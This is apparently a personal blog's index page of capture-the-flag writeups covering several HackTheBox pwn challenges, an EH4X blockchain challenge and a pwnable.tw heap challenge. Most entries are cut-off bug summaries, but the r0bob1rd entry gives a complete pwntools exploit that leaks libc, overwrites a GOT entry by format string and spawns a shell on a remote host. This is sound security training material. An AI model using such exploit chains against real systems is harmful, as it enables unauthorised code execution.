Pwn on Zero's Blog

EH4X CTF 2026: Writeup

Wed, 04 Mar 2026 14:00:00 +0700

Overview

This post collects the solved EH4X CTF 2026 challenges and the practical exploitation approach used for each.

Heist V1 (Blockchain)

TL;DR

The vault trusted governance too much. By setting governance to an attacker contract and abusing delegatecall execution, storage got overwritten (admin/paused), then funds could be withdrawn.

HTB - Pwn: Arms roped

Tue, 03 Mar 2026 15:20:00 +0700

Challenge Summary

Name: Arms roped
Category: Pwn
Difficulty: Medium
Goal: Get code execution and read the flag.

Binary Recon

Initial triage (file, checksec, readelf) showed:

32-bit ARM ELF
PIE enabled
Stack canary enabled
NX enabled
Partial RELRO
Bundled libc.so.6

Main vulnerable path is in string_storer():

reads with scanf("%m[^\n]%n", &tmp, &n)
copies with memcpy(localbuf, tmp, n)
prints with puts(localbuf)

The bug is straightforward: attacker-controlled n is copied into a fixed stack buffer.

HTB - Pwn: TicTacToed

Thu, 26 Feb 2026 17:00:00 +0700

Challenge Summary

Name: TicTacToed
Category: Pwn
Difficulty: Medium
Goal: Unlock the hidden interface, pass authentication, and recover the flag from the embedded C2 workflow.

Initial Recon

The challenge binary is a Rust ELF (PIE, Full RELRO, NX, no canary, not stripped), with useful symbols left intact.

Important symbols during reversing:

main
check_winner
validate_access_code
decrypt_key
ask_for_credentials
execute_c2

Key observations:

A hidden path unlocks after a specific 5x5 tic-tac-toe win pattern.
Auth is not random: input is SHA-256 checked against an embedded expected hash.
decrypt_key reconstructs the credential from 3 encrypted parts using XOR ^ 0x5a.
On successful auth, the binary drops and executes a second ELF (/tmp/C2_executable).

Hidden Credential Recovery

decrypt_key uses three encrypted byte arrays (ENC_PART1/2/3) and applies a transform closure equivalent to:

HTB - Pwn: Portaloo

Thu, 26 Feb 2026 15:25:00 +0700

Challenge Summary

Name: Portaloo
Category: Pwn
Difficulty: Medium
Goal: Turn the portal manager bugs into code execution and recover the flag.

Initial Recon

checksec profile:

64-bit ELF
PIE enabled
Full RELRO
Canary enabled
NX enabled
Not stripped

Menu primitives:

Create Portal
Destroy Portal
Upgrade Portal
Peek into the Void
Step into the portal

Interesting functions from reversing:

create_portal
destroy_portal
upgrade_portal
peek_into_the_void
step_into_the_portal

Vulnerability Chain

1) Use-After-Free in portal slots

destroy_portal calls free(slots[idx]) but does not clear the slot pointer. That leaves stale freed pointers reachable via other menu actions.

HTB - Pwn: Evil Corp

Thu, 26 Feb 2026 03:40:00 +0700

Challenge Summary

Name: Evil Corp
Category: Pwn
Difficulty: Medium
Goal: Exploit the support-message path to get code execution and recover the flag

Initial Triage

Binary: evil-corp

checksec:

64-bit ELF
PIE enabled
NX enabled
Partial RELRO
No stack canary
Not stripped

Key behavior:

Program uses wide-char I/O (fgetws, wcscmp, wcstol, wprintf)
Login credentials are hardcoded and checked with wcscmp
Menu option 2 (ContactSupport) is the vulnerable path

Recovered credentials:

HTB - Pwn: r0bob1rd

Wed, 25 Feb 2026 17:45:00 +0700

Challenge Summary

Name: r0bob1rd
Category: Pwn
Difficulty: Easy
Goal: Gain shell and read flag from remote service

Binary Recon

checksec and static triage show:

64-bit ELF
NX enabled
Stack canary enabled
Partial RELRO
No PIE
Not stripped

Core issues in operation():

Negative index OOB read on global robobirdNames table:
- User-controlled index is used in pointer arithmetic around .data/.got.
- -8 maps to setvbuf@got and leaks libc pointer bytes.
Format string vulnerability:
- user input is passed directly to printf(buf).
- Enables arbitrary write primitive via %n payloads.

Exploit Plan

Send index -8 to leak setvbuf@got runtime address.
Compute libc_base = leak - libc.sym['setvbuf'].
Use FSB payload to overwrite __stack_chk_fail@got with a libc one_gadget.
Overflow description (fgets into smaller stack buffer) to force canary failure.
Canary check calls hijacked __stack_chk_fail => one_gadget => shell.
Execute cat /flag.txt.

Working Exploit Script

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.bits = 64
context.log_level = 'info'

BIN = './r0bob1rd'
LIBC = './glibc/libc.so.6'
LD = './glibc/ld.so.2'

HOST = '154.57.164.74'
PORT = 32234

elf = ELF(BIN, checksec=False)
libc = ELF(LIBC, checksec=False)


def start(remote_mode=True):
    if remote_mode:
        return remote(HOST, PORT)
    return process([LD, BIN])


def solve(io):
    # Stage 1: OOB leak from setvbuf@got via negative index
    io.sendlineafter(b'>', b'-8')
    io.recvuntil(b'sen: ')
    leak_raw = io.recvuntil(b'\n', drop=True)
    leak = u64(leak_raw[:6].ljust(8, b'\x00'))

    libc.address = leak - libc.sym['setvbuf']
    log.success(f'libc base = {hex(libc.address)}')

    # one_gadget candidates from bundled libc
    # 0xe3afe, 0xe3b01, 0xe3b04
    one = libc.address + 0xe3b01
    log.success(f'one_gadget = {hex(one)}')

    # Stage 2: format-string overwrite
    payload = fmtstr_payload(
        8,
        {elf.got['__stack_chk_fail']: one},
        write_size='short'
    ).ljust(106, b'\x90')

    io.sendlineafter(b'>', payload)

    # Give epilogue path a moment and then use shell
    sleep(0.8)
    io.sendline(b'echo __PWNED__')
    io.sendline(b'id')
    io.sendline(b'cat /flag.txt || cat flag.txt')

    out = io.recvrepeat(2.0)
    print(out.decode(errors='ignore'))


if __name__ == '__main__':
    io = start(remote_mode=True)
    solve(io)
    io.close()

Notes

This target combines two bugs: the OOB leak provides stable libc base, while FSB gives arbitrary write.
Partial RELRO keeps GOT writable, so __stack_chk_fail@got is a clean control-flow target.
The canary is not bypassed; it is intentionally triggered to pivot into hijacked GOT.

Result

HTB{S0m3t1m3s_bl0w1ng_th3_pr0gr4m_1s_g00d}

HTB - Pwn: Execute

Wed, 25 Feb 2026 11:40:00 +0700

Challenge Summary

Name: Execute
Category: Pwn
Difficulty: Easy
Goal: Execute shellcode despite blacklist restrictions and print flag.

Root Cause

Program reads user bytes and jumps to them directly:

int size = read(0, buf, 60);
if(!check(blacklist, buf, size, strlen(blacklist))) exit(1337);
((void(*)()) buf)();

The first-stage payload is filtered against blacklist bytes, but code execution is still intentional (execstack, NX disabled).

Blacklist bytes include values from typical /bin/sh shellcode (3b, 2f, 62, 69, 6e, 73, 68, …), so a direct one-shot payload is blocked.

HTB - Pwn: Restaurant

Wed, 25 Feb 2026 11:35:00 +0700

Challenge Summary

Name: Restaurant
Category: Pwn
Difficulty: Easy
Goal: Gain code execution and read the flag.

Root Cause

The vulnerability is in fill():

local stack buffer is 0x20 bytes
read(0, buf, 0x400) allows stack overflow
no canary + no PIE make RIP control straightforward
NX is enabled, so we use ROP/ret2libc (no shellcode on stack)

Security profile of binary:

Full RELRO
NX enabled
No PIE
No canary

Exploit Strategy

Use a two-stage chain:

0x3 - Learn CTF: Binary Exploitation

Tue, 24 Feb 2026 04:10:00 +0700

Secret Garden — fastbin dup + `__malloc_hook` overwrite (glibc 2.23)

Summary

Category: Pwn / Heap Exploitation
Challenge: pwnable.tw - secretgarden
Binary: secretgarden
Libc: libc_64.so.6 (Ubuntu GLIBC 2.23)
Protections: RELRO + Canary + NX + PIE
Flag:

FLAG{FastBiN_C0rruption_t0_BUrN_7H3_G4rd3n}

Bug and primitive

The program stores flower objects in a global array. Each flower has a heap-allocated name pointer.

Pwn on Zero's Blog

EH4X CTF 2026: Writeup

Overview

Table of Contents

Heist V1 (Blockchain)

TL;DR

HTB - Pwn: Arms roped

Challenge Summary

Binary Recon

HTB - Pwn: TicTacToed

Challenge Summary

Initial Recon

Hidden Credential Recovery

HTB - Pwn: Portaloo

Challenge Summary

Initial Recon

Vulnerability Chain

1) Use-After-Free in portal slots

HTB - Pwn: Evil Corp

Challenge Summary

Initial Triage

HTB - Pwn: r0bob1rd

Challenge Summary

Binary Recon

Exploit Plan

Working Exploit Script

Notes

Result

HTB - Pwn: Execute

Challenge Summary

Root Cause

HTB - Pwn: Restaurant

Challenge Summary

Root Cause

Exploit Strategy

0x3 - Learn CTF: Binary Exploitation

Table of Contents

Secret Garden — fastbin dup + `__malloc_hook` overwrite (glibc 2.23)

Summary

Bug and primitive

Pwn on Zero's Blog

EH4X CTF 2026: Writeup

Overview

Table of Contents

Heist V1 (Blockchain)

TL;DR

HTB - Pwn: Arms roped

Challenge Summary

Binary Recon

HTB - Pwn: TicTacToed

Challenge Summary

Initial Recon

Hidden Credential Recovery

HTB - Pwn: Portaloo

Challenge Summary

Initial Recon

Vulnerability Chain

1) Use-After-Free in portal slots

HTB - Pwn: Evil Corp

Challenge Summary

Initial Triage

HTB - Pwn: r0bob1rd

Challenge Summary

Binary Recon

Exploit Plan

Working Exploit Script

Notes

Result

HTB - Pwn: Execute

Challenge Summary

Root Cause

HTB - Pwn: Restaurant

Challenge Summary

Root Cause

Exploit Strategy

0x3 - Learn CTF: Binary Exploitation

Table of Contents

Secret Garden — fastbin dup + __malloc_hook overwrite (glibc 2.23)

Summary

Bug and primitive

Secret Garden — fastbin dup + `__malloc_hook` overwrite (glibc 2.23)